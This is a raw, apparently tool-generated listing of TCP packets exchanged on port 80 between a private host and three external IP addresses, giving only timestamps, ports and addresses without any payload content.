Sep 21, 2024 14:48:10.661531925 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661545038 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661549091 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661554098 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.661581039 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661587954 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661593914 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661612034 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.661638021 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.661649942 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.661676884 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661683083 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661700964 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661705971 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661719084 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661725998 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.661752939 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.661897898 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661904097 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661923885 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661931038 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661938906 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661950111 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661956072 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.661957026 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661962986 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661977053 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.662048101 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.666260004 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.666265965 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.666273117 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.666285038 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.666291952 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.666297913 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.666310072 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.666316032 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.666359901 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.666387081 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.668697119 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668703079 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668714046 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668756008 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668761969 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668768883 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.668773890 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668782949 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668792009 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.668806076 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668812037 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668812037 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.668818951 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668840885 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.668849945 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.668883085 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668898106 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668903112 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668936014 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.668940067 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668945074 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668957949 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668963909 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.668988943 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669009924 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669022083 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669028997 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669039011 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669044971 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669050932 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669070959 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669090986 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669205904 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669210911 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669223070 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669228077 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669234991 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669241905 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669255972 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669270992 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669289112 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669301033 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669306040 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669312000 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669316053 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669333935 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669339895 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669343948 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669347048 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669352055 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669358969 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669363976 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669373035 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669379950 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669389009 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669390917 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669398069 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669404984 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669416904 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669429064 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669450998 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669456959 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669464111 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669502974 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669574022 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669579983 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669590950 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669595003 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669612885 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669617891 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669621944 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669630051 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669636965 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669640064 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669644117 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669663906 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669686079 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669713020 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669723034 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669728041 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669734001 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669740915 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669745922 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669784069 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669800997 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669811964 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669816971 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669831038 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669855118 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669948101 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.669976950 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.669982910 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670001030 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670007944 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670017958 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670018911 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670025110 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670032978 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670042992 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670048952 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670052052 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670063019 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670084953 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670109987 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670124054 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670134068 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670139074 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670150995 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670156002 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670161963 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670175076 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670181036 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670181036 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670186996 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670193911 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670198917 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670212030 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670218945 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670238972 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670258045 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670427084 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670516968 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670523882 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.670535088 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.670578957 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670617104 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670622110 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670633078 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670638084 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670646906 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670653105 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.670660019 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670663118 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670666933 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.670679092 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.670682907 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670686960 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.670698881 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.670703888 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670705080 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.670715094 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.670732975 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.670743942 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.670744896 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.670751095 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670763016 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670768023 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670773983 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670779943 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670784950 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670793056 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.670814991 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670814991 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670842886 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.670957088 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.670969963 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.670975924 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670985937 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670991898 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.670995951 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.671001911 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671013117 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671016932 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671017885 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671025038 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671025991 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.671030998 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671044111 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671046972 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671047926 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.671056986 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.671066046 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671067953 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.671073914 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.671081066 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671086073 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671097040 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671097994 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.671098948 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.671104908 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.671111107 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.671114922 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.671118975 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.671120882 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671127081 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671133995 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671139956 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671145916 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.671147108 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671147108 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671169996 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671170950 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.671191931 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671195984 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671201944 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671212912 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671216011 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671221972 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671228886 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671240091 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671241045 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671247959 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671253920 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671262026 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671283960 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671303034 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671451092 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671490908 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671499014 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671504974 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671550989 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671565056 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671577930 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671613932 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671650887 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671657085 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671668053 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671700954 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671730995 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671766996 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671772957 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671783924 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671788931 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671796083 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671802044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671808958 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671812057 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671817064 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671823978 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671834946 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671875000 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671875954 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671897888 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671911001 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671924114 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671928883 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671941996 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671952963 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671957016 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671963930 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671973944 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671973944 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671982050 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671987057 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.671988964 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.671993971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672002077 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672009945 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672024012 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672032118 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672038078 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672048092 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672049046 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672056913 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672064066 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672068119 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672086954 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672105074 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672117949 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672182083 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672188044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672228098 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672297001 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672307014 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672318935 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672324896 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672332048 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672338963 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672358036 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672375917 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672486067 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672492981 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672506094 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672511101 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672517061 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672522068 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672529936 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672540903 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672548056 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672564030 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672565937 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672575951 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672580957 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672583103 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672588110 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672595024 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672610998 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672616005 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672619104 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672630072 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672633886 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672641993 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672662973 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672672987 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672679901 CEST	80	49712	103.130.147.211	192.168.2.9
